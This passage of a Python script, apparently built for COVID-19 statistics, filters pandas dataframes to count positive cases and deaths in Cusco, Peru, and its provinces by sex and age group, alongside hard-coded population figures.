fallecidos_cusco = list(casos_fallecidos[casos_fallecidos['DEPARTAMENTO'] == "CUSCO"].shape)[0]
fallecidos_hombres_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Departamento Cusco - Etapa de vida
fallecidos_preinfancia_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco = list(casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco = list(
casos_fallecidos[(casos_fallecidos['DEPARTAMENTO'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Provincias Cusco
#!Cusco-Cusco
poblacion_cusco_cusco = 477462
positivos_cusco_cusco = list(casos_positivos[casos_positivos['PROVINCIA'] == "CUSCO"].shape)[0]
positivos_hombres_cusco_cusco = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CUSCO") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_cusco = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CUSCO") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_cusco = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "CUSCO"].shape)[0]
fallecidos_hombres_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Cusco - Etapa de vida
fallecidos_preinfancia_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_cusco = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_cusco = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CUSCO") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Acomayo
poblacion_cusco_acomayo = 26977
positivos_cusco_acomayo = list(casos_positivos[casos_positivos['PROVINCIA'] == "ACOMAYO"].shape)[0]
positivos_hombres_cusco_acomayo = list(casos_positivos[(casos_positivos['PROVINCIA'] == "ACOMAYO") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_acomayo = list(casos_positivos[(casos_positivos['PROVINCIA'] == "ACOMAYO") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_acomayo = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "ACOMAYO"].shape)[0]
fallecidos_hombres_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Acomayo - Etapa de vida
fallecidos_preinfancia_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_acomayo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_acomayo = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ACOMAYO") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Anta
poblacion_cusco_anta = 58268
positivos_cusco_anta = list(casos_positivos[casos_positivos['PROVINCIA'] == "ANTA"].shape)[0]
positivos_hombres_cusco_anta = list(casos_positivos[(casos_positivos['PROVINCIA'] == "ANTA") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_anta = list(casos_positivos[(casos_positivos['PROVINCIA'] == "ANTA") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_anta = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "ANTA"].shape)[0]
fallecidos_hombres_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Anta - Etapa de vida
fallecidos_preinfancia_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_anta = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_anta = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ANTA") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Calca
poblacion_cusco_calca = 75968
positivos_cusco_calca = list(casos_positivos[casos_positivos['PROVINCIA'] == "CALCA"].shape)[0]
positivos_hombres_cusco_calca = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CALCA") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_calca = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CALCA") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_calca = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "CALCA"].shape)[0]
fallecidos_hombres_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Calca - Etapa de vida
fallecidos_preinfancia_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_calca = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_calca = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CALCA") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Canas
poblacion_cusco_canas = 38696
positivos_cusco_canas = list(casos_positivos[casos_positivos['PROVINCIA'] == "CANAS"].shape)[0]
positivos_hombres_cusco_canas = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CANAS") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_canas = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CANAS") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_canas = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "CANAS"].shape)[0]
fallecidos_hombres_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Canas - Etapa de vida
fallecidos_preinfancia_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_canas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_canas = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Canchis
poblacion_cusco_canchis = 104056
positivos_cusco_canchis = list(casos_positivos[casos_positivos['PROVINCIA'] == "CANCHIS"].shape)[0]
positivos_hombres_cusco_canchis = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CANCHIS") &(casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_canchis = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CANCHIS") &(casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_canchis = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "CANCHIS"].shape)[0]
fallecidos_hombres_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Canchis - Etapa de vida
fallecidos_preinfancia_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_canchis = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_canchis = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CANCHIS") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Chumbivilcas
poblacion_cusco_chumbivilcas = 81415
positivos_cusco_chumbivilcas = list(casos_positivos[casos_positivos['PROVINCIA'] == "CHUMBIVILCAS"].shape)[0]
positivos_hombres_cusco_chumbivilcas = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_chumbivilcas = list(casos_positivos[(casos_positivos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_chumbivilcas = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS"].shape)[0]
fallecidos_hombres_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Canchis - Etapa de vida
fallecidos_preinfancia_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_chumbivilcas = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_chumbivilcas = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "CHUMBIVILCAS") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Espinar
poblacion_cusco_espinar = 70132
positivos_cusco_espinar = list(casos_positivos[casos_positivos['PROVINCIA'] == "ESPINAR"].shape)[0]
positivos_hombres_cusco_espinar = list(casos_positivos[(casos_positivos['PROVINCIA'] == "ESPINAR") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_espinar = list(casos_positivos[(casos_positivos['PROVINCIA'] == "ESPINAR") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_espinar = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "ESPINAR"].shape)[0]
fallecidos_hombres_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Espinar - Etapa de vida
fallecidos_preinfancia_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_espinar = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_espinar = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "ESPINAR") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Convencion
poblacion_cusco_convencion = 186667
positivos_cusco_convencion = list(casos_positivos[casos_positivos['PROVINCIA'] == "LA CONVENCION"].shape)[0]
positivos_hombres_cusco_convencion = list(casos_positivos[(casos_positivos['PROVINCIA'] == "LA CONVENCION") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_convencion = list(casos_positivos[(casos_positivos['PROVINCIA'] == "LA CONVENCION") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_convencion = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "LA CONVENCION"].shape)[0]
fallecidos_hombres_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Espinar - Etapa de vida
fallecidos_preinfancia_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_convencion = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_convencion = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "LA CONVENCION") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Paruro
poblacion_cusco_paruro = 29818
positivos_cusco_paruro = list(casos_positivos[casos_positivos['PROVINCIA'] == "PARURO"].shape)[0]
positivos_hombres_cusco_paruro = list(casos_positivos[(casos_positivos['PROVINCIA'] == "PARURO") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_paruro = list(casos_positivos[(casos_positivos['PROVINCIA'] == "PARURO") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_paruro = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "PARURO"].shape)[0]
fallecidos_hombres_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Paruro - Etapa de vida
fallecidos_preinfancia_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_paruro = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_paruro = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PARURO") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Paucartambo
poblacion_cusco_paucartambo = 51150
positivos_cusco_paucartambo = list(casos_positivos[casos_positivos['PROVINCIA'] == "PAUCARTAMBO"].shape)[0]
positivos_hombres_cusco_paucartambo = list(casos_positivos[(casos_positivos['PROVINCIA'] == "PAUCARTAMBO") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_paucartambo = list(casos_positivos[(casos_positivos['PROVINCIA'] == "PAUCARTAMBO") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_paucartambo = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO"].shape)[0]
fallecidos_hombres_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Paucartambo - Etapa de vida
fallecidos_preinfancia_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_paucartambo = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_paucartambo = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Quispicanchi
poblacion_cusco_quispicanchi = 92060
positivos_cusco_quispicanchi = list(casos_positivos[casos_positivos['PROVINCIA'] == "QUISPICANCHI"].shape)[0]
positivos_hombres_cusco_quispicanchi = list(casos_positivos[(casos_positivos['PROVINCIA'] == "QUISPICANCHI") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_quispicanchi = list(casos_positivos[(casos_positivos['PROVINCIA'] == "QUISPICANCHI") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_quispicanchi = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "QUISPICANCHI"].shape)[0]
